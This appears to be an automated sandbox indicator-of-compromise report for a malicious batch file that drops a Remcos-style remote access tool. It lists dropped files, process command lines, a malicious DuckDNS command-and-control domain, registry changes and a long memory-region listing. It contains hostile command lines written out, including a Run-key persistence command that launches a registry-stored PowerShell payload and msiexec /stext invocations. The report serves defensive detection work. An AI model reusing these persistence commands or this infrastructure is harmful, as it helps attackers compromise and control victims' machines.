IOC Report
ZW_PCCE-010023024001.bat

Files

| File Path | Type | Category | Malicious |
|---|---|---|---|
| `ZW_PCCE-010023024001.bat` | ASCII text, with very long lines (5980), with no line terminators | initial sample | malicious |
| `C:\ProgramData\remcos\logs.dat` | data | dropped | malicious |
| `C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs` | data | dropped | malicious |
| `C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WDKI0JR2\json[1].json` | JSON data | dropped | |
| `C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache` | data | modified | |
| `C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive` | data | dropped | |
| `C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kl32ek5g.jjk.ps1` | ASCII text, with no line terminators | dropped | |
| `C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mje33vhh.a24.psm1` | ASCII text, with no line terminators | dropped | |
| `C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vaucwujz.b0r.psm1` | ASCII text, with no line terminators | dropped | |
| `C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_x45nip12.f4u.ps1` | ASCII text, with no line terminators | dropped | |
| `C:\Users\user\AppData\Local\Temp\bhv6BC6.tmp` | Extensible storage engine DataBase, version 0x620, checksum 0x5c23815b, page size 32768, DirtyShutdown, Windows version 10.0 | dropped | |
| `C:\Users\user\AppData\Local\Temp\kywjvrv` | Unicode text, UTF-16, little-endian text, with no line terminators | dropped | |
| `C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\2BWCY09RDCGF38WA994P.temp` | data | dropped | |
| `C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDesusertions\590aee7bdd69b59b.customDesusertions-ms (copy)` | data | dropped | |
| `C:\Users\user\AppData\Roaming\Trykimprgneredes.Ene` | ASCII text, with very long lines (65536), with no line terminators | dropped | |

Processes

| Path | Cmdline | Malicious |
|---|---|---|
| `C:\Windows\System32\cmd.exe` | `C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\ZW_PCCE-010023024001.bat" "` | malicious |
| `C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe` | `powershell.exe -windowstyle hidden` (obfuscated inline script omitted) | malicious |
| `C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` | `"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"` (obfuscated inline script omitted) | malicious |
| `C:\Windows\SysWOW64\msiexec.exe` | `"C:\Windows\SysWOW64\msiexec.exe"` | malicious |
| `C:\Windows\SysWOW64\msiexec.exe` | `C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\kywjvrv"` | malicious |
| `C:\Windows\SysWOW64\msiexec.exe` | `C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\uabbwbgmjcn"` | malicious |
| `C:\Windows\SysWOW64\msiexec.exe` | `C:\Windows\System32\msiexec.exe /stext "C:\Users\user\AppData\Local\Temp\fuomwurowkfkpf"` | malicious |
| `C:\Windows\SysWOW64\wscript.exe` | `"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\udmiwkqorwjzipcigan.vbs"` | malicious |
| `C:\Windows\System32\conhost.exe` | `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` | |
| `C:\Windows\System32\conhost.exe` | `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` | |
| `C:\Windows\System32\conhost.exe` | `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` | |
| `C:\Windows\SysWOW64\cmd.exe` | `"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"` | |
| `C:\Windows\System32\conhost.exe` | `C:\Windows\system32\conhost.exe 0xffffffff -ForceV1` | |
| `C:\Windows\SysWOW64\reg.exe` | `REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Startup key" /t REG_EXPAND_SZ /d "%Mirko% -windowstyle 1 $Pulsmjr=(gp -Path 'HKCU:\Software\Millihenries\').Scuttock;%Mirko% ($Pulsmjr)"` | |

URLs


Domains

| Name | IP | Malicious |
|---|---|---|
| rj0987654321.duckdns.org | 193.187.91.212 | malicious |
| ethys.ro | 81.180.144.124 | |
| geoplugin.net | 178.237.33.50 | |
| s-part-0017.t-0009.fb-t-msedge.net | 13.107.253.45 | |

IPs

| IP | Domain | Country | Malicious |
|---|---|---|---|
| 193.187.91.212 | rj0987654321.duckdns.org | Sweden | malicious |
| 81.180.144.124 | ethys.ro | Romania | |
| 178.237.33.50 | geoplugin.net | Netherlands | |

Registry

| Path | Value | Malicious |
|---|---|---|
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | `EnableFileTracing` | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | `EnableAutoFileTracing` | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | `EnableConsoleTracing` | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | `FileTracingMask` | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | `ConsoleTracingMask` | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | `MaxFileSize` | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32` | `FileDirectory` | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | `EnableFileTracing` | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | `EnableAutoFileTracing` | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | `EnableConsoleTracing` | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | `FileTracingMask` | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | `ConsoleTracingMask` | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | `MaxFileSize` | |
| `HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS` | `FileDirectory` | |
| `HKEY_CURRENT_USER\SOFTWARE\Millihenries` | `Scuttock` | |
| `HKEY_CURRENT_USER\Environment` | `Mirko` | |
| `HKEY_CURRENT_USER\SOFTWARE\Rmc-I42HQ2` | `exepath` | |
| `HKEY_CURRENT_USER\SOFTWARE\Rmc-I42HQ2` | `licence` | |
| `HKEY_CURRENT_USER\SOFTWARE\Rmc-I42HQ2` | `time` | |
| `HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache` | `LangID` | |
| `HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache` | `C:\Windows\System32\WScript.exe.FriendlyAppName` | |
| `HKEY_CURRENT_USER_Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache` | `C:\Windows\System32\WScript.exe.ApplicationCompany` | |
| `HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run` | `Startup key` | |

Memdumps

7535000
heap
page read and write
934000
heap
page read and write
715A000
stack
page read and write
2B46000
heap
page read and write
4AF6000
heap
page read and write
2661000
heap
page read and write
BCD000
stack
page read and write
7FF887A90000
trusted library allocation
page execute and read and write
7830000
trusted library allocation
page execute and read and write
8A37000
heap
page read and write
13FE9F15000
heap
page read and write
4DC2000
heap
page read and write
4A97000
heap
page read and write
499E000
heap
page read and write
2AA0000
heap
page read and write
2696000
heap
page read and write
13FE7E6C000
heap
page read and write
43A5000
heap
page read and write
B006000
direct allocation
page execute and read and write
13FEA11D000
heap
page read and write
5BB1000
trusted library allocation
page read and write
4A21000
trusted library allocation
page read and write
B439B9000
stack
page read and write
43A9000
heap
page read and write
2694000
heap
page read and write
4A9B000
heap
page read and write
13FEA11F000
heap
page read and write
26A6000
heap
page read and write
BA06000
direct allocation
page execute and read and write
7DF4FD240000
trusted library allocation
page execute and read and write
7070000
direct allocation
page read and write
43B8000
heap
page read and write
43B1000
heap
page read and write
43A1000
heap
page read and write
43A1000
heap
page read and write
B43ABE000
stack
page read and write
13FEA0F7000
heap
page execute and read and write
43A0000
heap
page read and write
4AF6000
heap
page read and write
302A000
heap
page read and write
8A8C000
heap
page read and write
89C0000
direct allocation
page read and write
8AA4000
heap
page read and write
43B8000
heap
page read and write
4DCC000
heap
page read and write
2D94000
heap
page read and write
43A5000
heap
page read and write
7FF887B81000
trusted library allocation
page read and write
7900000
trusted library allocation
page read and write
3040000
trusted library allocation
page read and write
3380000
heap
page read and write
43B8000
heap
page read and write
49FF000
stack
page read and write
5040000
trusted library allocation
page read and write
2686000
heap
page read and write
4A98000
heap
page read and write
70C0000
direct allocation
page read and write
4AA9000
heap
page read and write
7880000
trusted library allocation
page read and write
8A99000
heap
page read and write
B431EE000
stack
page read and write
83B0000
trusted library allocation
page execute and read and write
7FF887AB6000
trusted library allocation
page execute and read and write
43A9000
heap
page read and write
25FB1000
heap
page read and write
73DE000
stack
page read and write
2DA000
stack
page read and write
705B000
stack
page read and write
8940000
trusted library allocation
page read and write
EBE000
stack
page read and write
269B000
heap
page read and write
2657000
heap
page read and write
7860000
trusted library allocation
page read and write
13FE9D80000
heap
page execute and read and write
725B000
stack
page read and write
4A9E000
heap
page read and write
13FE7E73000
heap
page read and write
4C90000
trusted library allocation
page read and write
7FF887BB2000
trusted library allocation
page read and write
84C5000
trusted library allocation
page read and write
43C1000
heap
page read and write
43B8000
heap
page read and write
4A97000
heap
page read and write
89E0000
direct allocation
page read and write
43A1000
heap
page read and write
400000
system
page execute and read and write
3384000
heap
page read and write
31C0000
heap
page read and write
89B0000
direct allocation
page read and write
8A8C000
heap
page read and write
8AA4000
heap
page read and write
95E000
unkown
page read and write
8A9A000
heap
page read and write
4ABE000
heap
page read and write
43B1000
heap
page read and write
24605000
heap
page read and write
2675000
heap
page read and write
7FF887D40000
trusted library allocation
page read and write
7FF887CC0000
trusted library allocation
page read and write
13F815B8000
trusted library allocation
page read and write
43B8000
heap
page read and write
25596000
heap
page read and write
13FE9E20000
heap
page execute and read and write
503E000
trusted library allocation
page read and write
4AF6000
heap
page read and write
B436FE000
stack
page read and write
5A21000
trusted library allocation
page read and write
24820000
heap
page read and write
4A7A000
trusted library allocation
page read and write
26A6000
heap
page read and write
3070000
heap
page read and write
43B5000
heap
page read and write
2D94000
heap
page read and write
30C8000
trusted library allocation
page read and write
5031000
heap
page read and write
13FE97D0000
heap
page read and write
934000
heap
page read and write
43BA000
heap
page read and write
8A8C000
heap
page read and write
86F8000
heap
page read and write
2661000
heap
page read and write
8AAB000
heap
page read and write
13FE7E2D000
heap
page read and write
7FF887BA0000
trusted library allocation
page execute and read and write
43B8000
heap
page read and write
5026000
trusted library allocation
page read and write
8610000
heap
page read and write
7FF887C40000
trusted library allocation
page read and write
7FF8879D2000
trusted library allocation
page read and write
293E000
stack
page read and write
85CC000
stack
page read and write
4AF6000
heap
page read and write
26A6000
heap
page read and write
2674000
heap
page read and write
30F0000
heap
page execute and read and write
43B8000
heap
page read and write
473000
system
page execute and read and write
43B8000
heap
page read and write
24020000
remote allocation
page read and write
2FED000
trusted library allocation
page execute and read and write
267B000
heap
page read and write
2DFE000
stack
page read and write
2D94000
heap
page read and write
B43937000
stack
page read and write
4AB6000
heap
page read and write
13FE9EC2000
heap
page read and write
43A1000
heap
page read and write
2645000
heap
page read and write
266D000
heap
page read and write
89A0000
direct allocation
page read and write
8A8C000
heap
page read and write
3383000
heap
page read and write
78D0000
trusted library allocation
page read and write
2689000
heap
page read and write
4AF6000
heap
page read and write
43B6000
heap
page read and write
4991000
heap
page read and write
2694000
heap
page read and write
43A1000
heap
page read and write
4DCD000
heap
page read and write
13F80001000
trusted library allocation
page read and write
7FF887C30000
trusted library allocation
page read and write
268E000
heap
page read and write
43AF000
heap
page read and write
8A44000
heap
page read and write
8A96000
heap
page read and write
777F000
stack
page read and write
2AA8000
heap
page read and write
4AF6000
heap
page read and write
2D70000
heap
page read and write
2D94000
heap
page read and write
25592000
heap
page read and write
83AE000
stack
page read and write
43B0000
heap
page read and write
24681000
heap
page read and write
13F9000F000
trusted library allocation
page read and write
8A37000
heap
page read and write
2D94000
heap
page read and write
2697000
heap
page read and write
43B5000
heap
page read and write
4C92000
heap
page read and write
78B0000
trusted library allocation
page read and write
245F8000
heap
page read and write
4AF6000
heap
page read and write
98C000
heap
page read and write
4AF6000
heap
page read and write
43B5000
heap
page read and write
5A49000
trusted library allocation
page read and write
D00000
heap
page read and write
4991000
heap
page read and write
8AA4000
heap
page read and write
4380000
heap
page read and write
257D000
stack
page read and write
7FF887BB7000
trusted library allocation
page read and write
43B8000
heap
page read and write
2FF8000
heap
page read and write
2F5A000
heap
page read and write
2660000
heap
page read and write
934000
heap
page read and write
4A90000
trusted library allocation
page read and write
8430000
trusted library allocation
page read and write
4A98000
heap
page read and write
74F0000
heap
page read and write
3020000
heap
page read and write
25591000
heap
page read and write
48C6000
heap
page read and write
13F8048D000
trusted library allocation
page read and write
D60000
heap
page read and write
8A9B000
heap
page read and write
8A50000
heap
page read and write
7820000
trusted library allocation
page read and write
4AF6000
heap
page read and write
4A9E000
heap
page read and write
8A8C000
heap
page read and write
25FBB000
heap
page read and write
7FF887B70000
trusted library allocation
page read and write
7840000
trusted library allocation
page read and write
43A0000
heap
page read and write
30FF000
unkown
page read and write
4A98000
heap
page read and write
773E000
stack
page read and write
43B5000
heap
page read and write
70A0000
direct allocation
page read and write
13FE7C80000
heap
page read and write
934000
heap
page read and write
13F80B81000
trusted library allocation
page read and write
6E9E000
stack
page read and write
4AD3000
heap
page read and write
2657000
heap
page read and write
8A99000
heap
page read and write
31BF000
heap
page read and write
934000
heap
page read and write
4AF6000
heap
page read and write
24614000
heap
page read and write
8A9B000
heap
page read and write
2680000
heap
page read and write
13FE7D80000
heap
page read and write
8A99000
heap
page read and write
25FB5000
heap
page read and write
2DBE000
unkown
page read and write
4AF6000
heap
page read and write
43A0000
heap
page read and write
C406000
direct allocation
page execute and read and write
350000
heap
page read and write
B4367E000
stack
page read and write
13FE9760000
heap
page readonly
6F4E000
stack
page read and write
267D000
heap
page read and write
13F81D81000
trusted library allocation
page read and write
2D94000
heap
page read and write
B43166000
stack
page read and write
810000
heap
page read and write
2651000
heap
page read and write
7FF887BC0000
trusted library allocation
page execute and read and write
2CAC000
stack
page read and write
934000
heap
page read and write
4AA1000
heap
page read and write
78A0000
trusted library allocation
page read and write
43CE000
heap
page read and write
24581000
heap
page read and write
13FEA1F6000
heap
page read and write
82F0000
trusted library allocation
page read and write
5407000
trusted library allocation
page read and write
13FE7EF5000
heap
page read and write
8707000
heap
page read and write
4ABA000
heap
page read and write
4A9B000
heap
page read and write
13F80483000
trusted library allocation
page read and write
7FF887D00000
trusted library allocation
page read and write
8AAB000
heap
page read and write
5A86000
trusted library allocation
page read and write
8AAB000
heap
page read and write
8A8C000
heap
page read and write
340000
heap
page read and write
7FF887AF0000
trusted library allocation
page execute and read and write
D68000
heap
page read and write
4AF6000
heap
page read and write
C5C000
stack
page read and write
4A99000
heap
page read and write
4AA9000
heap
page read and write
43B8000
heap
page read and write
31FD000
heap
page read and write
43B8000
heap
page read and write
45C000
system
page execute and read and write
24581000
heap
page read and write
4A95000
heap
page read and write
267E000
heap
page read and write
43AD000
heap
page read and write
B43C3B000
stack
page read and write
13FEA1D4000
heap
page read and write
C40000
heap
page read and write
B43B3E000
stack
page read and write
4AF6000
heap
page read and write
13FEA100000
heap
page read and write
43B8000
heap
page read and write
97E000
unkown
page read and write
4A97000
heap
page read and write
2D50000
heap
page read and write
265A000
heap
page read and write
268A000
heap
page read and write
43B5000
heap
page read and write
13FEA182000
heap
page read and write
13F81E9B000
trusted library allocation
page read and write
4A9B000
heap
page read and write
719E000
stack
page read and write
4A99000
heap
page read and write
13FE7F60000
heap
page read and write
8A9A000
heap
page read and write
43B5000
heap
page read and write
8A43000
heap
page read and write
2D94000
heap
page read and write
4ABA000
heap
page read and write
4A91000
heap
page read and write
751E000
heap
page read and write
4AF6000
heap
page read and write
8A8C000
heap
page read and write
25FBD000
heap
page read and write
2650000
heap
page read and write
26A6000
heap
page read and write
86BA000
heap
page read and write
30E0000
trusted library allocation
page read and write
13F81D86000
trusted library allocation
page read and write
266C000
heap
page read and write
71C000
stack
page read and write
4A99000
heap
page read and write
4AF6000
heap
page read and write
D50000
heap
page read and write
3180000
heap
page read and write
32CF000
stack
page read and write
43B8000
heap
page read and write
7C0000
heap
page read and write
7FF8879EB000
trusted library allocation
page read and write
13FE7E43000
heap
page read and write
8A01000
heap
page read and write
43A9000
heap
page read and write
8A37000
heap
page read and write
4AB6000
heap
page read and write
83F0000
trusted library allocation
page read and write
9206000
direct allocation
page execute and read and write
13FE7E2B000
heap
page read and write
935000
heap
page read and write
267E000
heap
page read and write
8A50000
heap
page read and write
82D7000
stack
page read and write
13FE9E74000
heap
page read and write
935000
heap
page read and write
711E000
stack
page read and write
8A9B000
heap
page read and write
2FA0000
heap
page read and write
4A98000
heap
page read and write
305E000
heap
page read and write
1DB000
stack
page read and write
43A1000
heap
page read and write
2671000
heap
page read and write
7D0000
heap
page readonly
6F00000
heap
page execute and read and write
545A000
trusted library allocation
page read and write
4A98000
heap
page read and write
B4383E000
stack
page read and write
13FE9750000
trusted library allocation
page read and write
43B5000
heap
page read and write
2661000
heap
page read and write
2686000
heap
page read and write
6A5C000
stack
page read and write
3383000
heap
page read and write
2FE3000
trusted library allocation
page execute and read and write
8A8C000
heap
page read and write
3022000
trusted library allocation
page read and write
4AF6000
heap
page read and write
2FE4000
trusted library allocation
page read and write
400000
system
page execute and read and write
2686000
heap
page read and write
2D94000
heap
page read and write
2694000
heap
page read and write
7FF887C80000
trusted library allocation
page read and write
25590000
heap
page read and write
2681000
heap
page read and write
935000
heap
page read and write
4C90000
trusted library allocation
page read and write
13FE7E23000
heap
page read and write
25591000
heap
page read and write
4AF6000
heap
page read and write
24614000
heap
page read and write
24950000
heap
page read and write
B4357E000
stack
page read and write
13FE9E7B000
heap
page read and write
2D94000
heap
page read and write
43B8000
heap
page read and write
935000
heap
page read and write
43AE000
heap
page read and write
13F80B9D000
trusted library allocation
page read and write
7F200000
trusted library allocation
page execute and read and write
43B5000
heap
page read and write
43AD000
heap
page read and write
75AF000
heap
page read and write
E7E000
stack
page read and write
43B6000
heap
page read and write
43E3000
heap
page read and write
7FF8879E0000
trusted library allocation
page read and write
13FE9EAA000
heap
page read and write
6E5F000
stack
page read and write
2694000
heap
page read and write
45D000
system
page execute and read and write
930000
heap
page read and write
13F805CE000
trusted library allocation
page read and write
5C0000
heap
page read and write
4990000
heap
page read and write
2F77000
heap
page read and write
43A0000
heap
page read and write
866D000
stack
page read and write
4AF6000
heap
page read and write
2675000
heap
page read and write
4AD4000
heap
page read and write
43D8000
heap
page read and write
2671000
heap
page read and write
304B000
heap
page read and write
48CE000
heap
page read and write
2672000
heap
page read and write
4AF6000
heap
page read and write
B437F9000
stack
page read and write
980000
heap
page read and write
2671000
heap
page read and write
43B8000
heap
page read and write
4C90000
trusted library allocation
page read and write
290E000
stack
page read and write
13F809B5000
trusted library allocation
page read and write
4ABF000
heap
page read and write
13F81DBA000
trusted library allocation
page read and write
13FEA1CE000
heap
page read and write
4A91000
heap
page read and write
7850000
trusted library allocation
page read and write
2661000
heap
page read and write
2D94000
heap
page read and write
13F81D97000
trusted library allocation
page read and write
4A95000
heap
page read and write
2693000
heap
page read and write
9DB000
heap
page read and write
8717000
heap
page read and write
935000
heap
page read and write
7FF887CF0000
trusted library allocation
page read and write
43B8000
heap
page read and write
4AB6000
heap
page read and write
4DCC000
heap
page read and write
2CEA000
stack
page read and write
13FE9C78000
heap
page read and write
43AF000
heap
page read and write
83C0000
heap
page read and write
247EC000
heap
page read and write
70D0000
direct allocation
page read and write
3160000
heap
page read and write
5398000
trusted library allocation
page read and write
9C06000
direct allocation
page execute and read and write
13FE9E30000
heap
page read and write
2651000
heap
page read and write
7E0000
heap
page read and write
43AF000
heap
page read and write
75D4000
heap
page read and write
24605000
heap
page read and write
78E0000
trusted library allocation
page read and write
43B8000
heap
page read and write
8960000
trusted library allocation
page read and write
8A37000
heap
page read and write
9DA000
heap
page read and write
8AA4000
heap
page read and write
4AF6000
heap
page read and write
4AFF000
stack
page read and write
4EE4000
heap
page read and write
2559C000
heap
page read and write
24020000
remote allocation
page read and write
C30000
heap
page read and write
4ABB000
heap
page read and write
41B000
system
page execute and read and write
13FEA231000
heap
page read and write
2684000
heap
page read and write
4A91000
heap
page read and write
2DEE000
unkown
page read and write
43B5000
heap
page read and write
43A9000
heap
page read and write
6E1E000
stack
page read and write
8A37000
heap
page read and write
5345000
trusted library allocation
page read and write
48BF000
stack
page read and write
3060000
trusted library allocation
page execute and read and write
88FE000
stack
page read and write
268E000
heap
page read and write
13FE7D60000
heap
page read and write
86FB000
heap
page read and write
247EC000
heap
page read and write
437E000
unkown
page read and write
B4377C000
stack
page read and write
8A44000
heap
page read and write
26A6000
heap
page read and write
2694000
heap
page read and write
8A37000
heap
page read and write
4C91000
heap
page read and write
3221000
heap
page read and write
8A9A000
heap
page read and write
2D60000
heap
page readonly
4ABF000
heap
page read and write
4C90000
trusted library allocation
page read and write
2684000
heap
page read and write
13F902FA000
trusted library allocation
page read and write
860C000
stack
page read and write
24921000
heap
page read and write
7060000
direct allocation
page read and write
8950000
trusted library allocation
page read and write
7FF887A86000
trusted library allocation
page read and write
5044000
trusted library allocation
page read and write
B4480B000
stack
page read and write
7FF887D30000
trusted library allocation
page read and write
43CA000
heap
page read and write
4AF6000
heap
page read and write
13F81A37000
trusted library allocation
page read and write
5030000
heap
page read and write
86B0000
heap
page read and write
2AA0000
heap
page read and write
13F8008D000
trusted library allocation
page read and write
536000
stack
page read and write
43B5000
heap
page read and write
7870000
trusted library allocation
page read and write
3009000
trusted library allocation
page read and write
8A8C000
heap
page read and write
13F8164B000
trusted library allocation
page read and write
86AC000
stack
page read and write
7FF887D60000
trusted library allocation
page read and write
4AF6000
heap
page read and write
4AF6000
heap
page read and write
8A44000
heap
page read and write
701D000
stack
page read and write
934000
heap
page read and write
2657000
heap
page read and write
4A99000
heap
page read and write
4A95000
heap
page read and write
77FD000
stack
page read and write
25093000
heap
page read and write
13FE9B50000
trusted library allocation
page read and write
459000
system
page execute and read and write
76F0000
heap
page execute and read and write
43BA000
heap
page read and write
7FF887C10000
trusted library allocation
page read and write
82E0000
trusted library allocation
page execute and read and write
266B000
heap
page read and write
B43BBF000
stack
page read and write
6F05000
heap
page execute and read and write
5031000
heap
page read and write
338D000
heap
page read and write
748E000
stack
page read and write
2D94000
heap
page read and write
873D000
heap
page read and write
313E000
stack
page read and write
25590000
heap
page read and write
78C0000
trusted library allocation
page read and write
43AF000
heap
page read and write
24616000
heap
page read and write
25AAF000
heap
page read and write
EFF000
stack
page read and write
13F8022C000
trusted library allocation
page read and write
30BE000
stack
page read and write
8A8C000
heap
page read and write
8450000
trusted library allocation
page read and write
25092000
heap
page read and write
B4347E000
stack
page read and write
2690000
heap
page read and write
2683000
heap
page read and write
43A1000
heap
page read and write
24773000
heap
page read and write
7808000
trusted library allocation
page read and write
8A99000
heap
page read and write
935000
heap
page read and write
934000
heap
page read and write
2673000
heap
page read and write
43D8000
heap
page read and write
3160000
heap
page read and write
43B8000
heap
page read and write
43A0000
heap
page read and write
8AA4000
heap
page read and write
267B000
heap
page read and write
4ADC000
heap
page read and write
53B4000
trusted library allocation
page read and write
2D90000
heap
page read and write
7FF887A80000
trusted library allocation
page read and write
4B9F000
stack
page read and write
13FE7E6E000
heap
page read and write
4A91000
heap
page read and write
25AA6000
heap
page read and write
2A00000
heap
page read and write
43AF000
heap
page read and write
86ED000
heap
page read and write
935000
heap
page read and write
2D94000
heap
page read and write
25D0000
heap
page read and write
4FE3000
heap
page read and write
269F000
heap
page read and write
4AF6000
heap
page read and write
836D000
stack
page read and write
6F8E000
stack
page read and write
4ABF000
heap
page read and write
88B0000
trusted library allocation
page execute and read and write
43AD000
heap
page read and write
26A6000
heap
page read and write
25FB5000
heap
page read and write
5361000
trusted library allocation
page read and write
26A2000
heap
page read and write
4F2E000
stack
page read and write
297F000
stack
page read and write
4AA1000
heap
page read and write
4AF6000
heap
page read and write
7FF887C90000
trusted library allocation
page read and write
2EFF000
unkown
page read and write
7FF887BB5000
trusted library allocation
page read and write
4AB6000
heap
page read and write
336B000
heap
page read and write
78F0000
trusted library allocation
page read and write
43B5000
heap
page read and write
8AA4000
heap
page read and write
3020000
trusted library allocation
page read and write
2692000
heap
page read and write
13FE7F65000
heap
page read and write
8AA4000
heap
page read and write
24631000
heap
page read and write
4AF6000
heap
page read and write
13F80B96000
trusted library allocation
page read and write
2930000
heap
page read and write
4AF6000
heap
page read and write
4AF6000
heap
page read and write
8A8C000
heap
page read and write
983000
heap
page read and write
4ADC000
heap
page read and write
5E0000
heap
page read and write
25AAC000
heap
page read and write
4AF6000
heap
page read and write
D806000
direct allocation
page execute and read and write
24888000
heap
page read and write
2D94000
heap
page read and write
25FCB000
heap
page read and write